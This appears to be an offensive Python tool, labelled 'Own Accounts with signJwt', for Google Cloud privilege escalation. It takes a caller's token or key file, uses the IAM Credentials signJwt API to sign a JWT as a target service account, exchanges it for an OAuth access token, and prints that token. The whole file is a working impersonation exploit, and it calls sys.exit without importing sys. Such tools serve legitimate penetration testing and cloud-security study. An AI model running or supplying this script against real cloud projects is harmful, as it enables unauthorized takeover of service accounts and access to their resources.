1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
|
#!/usr/bin/env python3
import requests
from google.oauth2 import service_account
import json
from datetime import datetime, timedelta
import google.auth.transport.requests
import argparse
def getTokenFromKeyFile(file_name):
scopes = ["https://www.googleapis.com/auth/cloud-platform"]
creds = service_account.Credentials.from_service_account_file(file_name, scopes=scopes)
auth_req = google.auth.transport.requests.Request()
creds.refresh(auth_req)
return creds.token
def getJwt(service_account_email, token):
now = int(datetime.now().timestamp())
payload = {
"iss":service_account_email,
"scope":"https://www.googleapis.com/auth/cloud-platform",
"aud":"https://oauth2.googleapis.com/token",
"iat": now,
"exp": now + 3600
}
body = {
"payload": json.dumps(payload)
}
headers = {
"Authorization": f"Bearer {token}",
"Content-Type":"Application/json"
}
signJwt_url = f"https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/{service_account_email}:signJwt"
r = requests.post(signJwt_url, json=body, headers=headers)
if r.status_code == 200:
signedJwt = r.json()['signedJwt']
return signedJwt
else:
print(f"[!] Signing Request failed (Status {r.status_code}): {r.text}")
sys.exit(1)
def getAccessToken(service_account_email, token):
assertion = getJwt(service_account_email, token)
grant_type = "urn:ietf:params:oauth:grant-type:jwt-bearer"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
body = {
"assertion": assertion,
"grant_type": grant_type
}
token_url = "https://oauth2.googleapis.com/token"
r = requests.post(token_url, data=body, headers=headers)
if r.status_code == 200:
return r.json()
def main():
parser = argparse.ArgumentParser(
description="Own Accounts with signJwt"
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-t", "--token", help="Caller's Access Token String")
group.add_argument("-f", "--token-file", help="Path to file containg Access Token")
group.add_argument("-k", "--key-file", help="Path to Service Account JSON key file")
parser.add_argument("-s", "--target-account", help="Target Service Account Email", required=True)
args = parser.parse_args()
token = None
if args.token:
token = args.token
elif args.token_file:
with open(args.token_file, 'r') as f:
token = f.read().strip()
elif args.key_file:
token = getTokenFromKeyFile(args.key_file)
if not token:
print("[!] Could not retrieve a valid caller token")
sys.exit(1)
service_account_email = None
if args.target_account:
service_account_email = args.target_account
try:
print("[*] Getting Access Token")
access_token = getAccessToken(service_account_email, token)
if access_token:
print(f"[*] Successfully retrieved access_token for {service_account_email}")
print(json.dumps(access_token, indent=2))
except Exception as e:
print(f"[!] An error occured while retrieving access_token for {service_account_email}")
if __name__ == "__main__":
main()
|